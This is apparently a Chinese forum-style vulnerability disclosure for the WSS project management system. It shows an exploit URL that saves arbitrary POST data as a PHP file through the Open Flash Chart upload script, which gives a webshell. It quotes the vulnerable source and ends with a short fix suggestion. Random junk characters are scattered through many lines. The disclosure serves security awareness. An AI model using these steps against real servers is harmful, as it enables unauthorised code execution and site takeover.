WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
2 G! r& C7 z; ]' W6 s! Z+ T5 E 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
' s* [2 Q. k4 ], a
利用：
: |2 [2 D' h) U/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
, }+ g5 a+ _0 b, Z. @2 Z
) N" H  y, v3 G" Z! b  P# NPost任意数据
保存位置http://localhost/chart/tmp-upload-images/hfy.php

% z) u8 j, l% K  y5 }. c
' g) n4 |1 |% M( r最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~
5 o4 g7 n" c$ w7 a2 M& z
<?php

9 W5 d& ~. G! k; M! B/ `//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
3 v6 j" @: ]# U$ D+ m) j//

, N; c. }! I) \5 F/*
+ \7 h8 T+ O4 i  w) T! ]' Q
& J( U$ m1 O+ Pprint_r( $_GET );
print_r( $_POST );
; u2 n+ c: y! F, U& ]print_r( $_FILES );
: ?( o$ K5 j9 W4 Z7 S6 V6 q4 M: J
print_r( $GLOBALS );
7 H3 x; [8 P& H7 H, Bprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
# G) [- M# \$ E' n5 S
( [- O, h0 H" o- z& Y*/
5 `- G4 \5 ?4 R2 q3 W0 ~// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);
; v- h7 J" `; `+ n- z
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

) }0 W, F$ S) a! o/ e- @echo 'Saving your image to: '. $destination;
! o2 ?8 @4 q. @// print_r( $_POST );
// print_r( $_SERVER );
) `4 z) n) @) ]// echo $HTTP_RAW_POST_DATA;
8 e, ?  b; {2 g0 q! l0 c
- \& {2 L7 W1 a  q. R- P: b; N//
// POST data is usually string data, but we are passing a RAW .png
5 |. `0 Y+ H; w' `% v/ W) F0 ]// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
- M! w2 o- ?( Q+ s! S9 O9 S//
8 d5 x% `! U3 }$ @
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//
8 u- X% D0 |  h' f* I
1 ^% r( L0 @4 n. m/ L
7 t7 i8 w) E$ R& }6 ^: ^! W; P// default path for the image to be stored //
1 n! h+ u$ U8 s, X( G0 }1 @$default_path = 'tmp-upload-images/';
; K. M% C7 x. V( a
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
" n- g( q# t' D8 x
5 d% D) u6 h$ e' L// full path to the saved image including filename //
! J- j9 \2 K+ e4 _% ~( R7 t- C$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
! G% v; h% q. t3 d
) s; e8 ^0 k6 I9 z3 \// move the image into the specified directory //
* ^8 ?; f* G  L* n& C6 xif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
2 K- M% B6 R% [( i4 o}

$ P  K2 c1 N0 t
9 {! P6 E! f% i3 W5 t  }' M( Z- t?>

5 U6 [2 n7 X% y  A
% |: X1 a' j) z) f



修复方案：
9 ]: h/ F4 i$ Q& f& g这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞
) d5 W6 \9 a' v
  X) `. z  V. ?+ u0 Q, r
0 ]+ l! ^6 u- T0 U( _9 K
8 ]8 W% ~& p) o( V5 [- Y1 ~7 p5 R" g